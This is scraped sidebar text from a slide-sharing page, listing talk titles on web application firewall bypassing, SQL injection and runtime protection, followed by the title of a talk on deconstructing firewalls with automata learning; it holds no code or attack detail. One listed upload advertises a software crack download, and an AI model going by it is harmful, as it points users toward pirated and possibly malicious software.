Real-World WebAppSec Flaws - Examples and Countermeasues
PPTX
20160211 OWASP Charlotte RASP
PDF
Automatically Repairing Web Application Firewalls based on Successful SQL Inj...
PDF
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
PPT
(In)Secure Ajax-Y Websites With PHP
 
PDF
The Ring programming language version 1.3 book - Part 30 of 88
PDF
Bypassing Web Application Firewalls and other security filters
PDF
Application Security around OWASP Top 10
PDF
FP Days: Down the Clojure Rabbit Hole
PDF
OWASP PHPIDS talk slides
PPT
Methods to Bypass a Web Application Firewall Eng
Lie to Me: Bypassing Modern Web Application Firewalls
Injecting Security into vulnerable web apps at Runtime
Technical Architecture of RASP Technology
Behind an Application Firewall, Are we Safe from SQL Injection Attacks?
Внедрение безопасности в веб-приложениях в среде выполнения
Как разработать DBFW с нуля
Обход файрволов веб-приложений
Database Firewall from Scratch
Speaking 'Development Language' (Or, how to get your hands dirty with technic...
Real-World WebAppSec Flaws - Examples and Countermeasues
20160211 OWASP Charlotte RASP
Automatically Repairing Web Application Firewalls based on Successful SQL Inj...
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
(In)Secure Ajax-Y Websites With PHP
 
The Ring programming language version 1.3 book - Part 30 of 88
Bypassing Web Application Firewalls and other security filters
Application Security around OWASP Top 10
FP Days: Down the Clojure Rabbit Hole
OWASP PHPIDS talk slides
Methods to Bypass a Web Application Firewall Eng
Ad

Recently uploaded (20)

PPTX
Operating system designcfffgfgggggggvggggggggg
PDF
Upgrade and Innovation Strategies for SAP ERP Customers
PDF
Understanding Forklifts - TECH EHS Solution
PDF
top salesforce developer skills in 2025.pdf
PDF
Internet Downloader Manager (IDM) Crack 6.42 Build 42 Updates Latest 2025
PPTX
Transform Your Business with a Software ERP System
PDF
PTS Company Brochure 2025 (1).pdf.......
PDF
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
PDF
Flood Susceptibility Mapping Using Image-Based 2D-CNN Deep Learnin. Overview ...
PDF
System and Network Administraation Chapter 3
PPTX
CHAPTER 2 - PM Management and IT Context
PDF
How to Choose the Right IT Partner for Your Business in Malaysia
PDF
Why TechBuilder is the Future of Pickup and Delivery App Development (1).pdf
PPTX
Odoo POS Development Services by CandidRoot Solutions
PDF
Addressing The Cult of Project Management Tools-Why Disconnected Work is Hold...
PDF
wealthsignaloriginal-com-DS-text-... (1).pdf
PPTX
Essential Infomation Tech presentation.pptx
PDF
AI in Product Development-omnex systems
PDF
T3DD25 TYPO3 Content Blocks - Deep Dive by André Kraus
PDF
Design an Analysis of Algorithms II-SECS-1021-03
Operating system designcfffgfgggggggvggggggggg
Upgrade and Innovation Strategies for SAP ERP Customers
Understanding Forklifts - TECH EHS Solution
top salesforce developer skills in 2025.pdf
Internet Downloader Manager (IDM) Crack 6.42 Build 42 Updates Latest 2025
Transform Your Business with a Software ERP System
PTS Company Brochure 2025 (1).pdf.......
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
Flood Susceptibility Mapping Using Image-Based 2D-CNN Deep Learnin. Overview ...
System and Network Administraation Chapter 3
CHAPTER 2 - PM Management and IT Context
How to Choose the Right IT Partner for Your Business in Malaysia
Why TechBuilder is the Future of Pickup and Delivery App Development (1).pdf
Odoo POS Development Services by CandidRoot Solutions
Addressing The Cult of Project Management Tools-Why Disconnected Work is Hold...
wealthsignaloriginal-com-DS-text-... (1).pdf
Essential Infomation Tech presentation.pptx
AI in Product Development-omnex systems
T3DD25 TYPO3 Content Blocks - Deep Dive by André Kraus
Design an Analysis of Algorithms II-SECS-1021-03
Ad

ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AUTOMATA LEARNING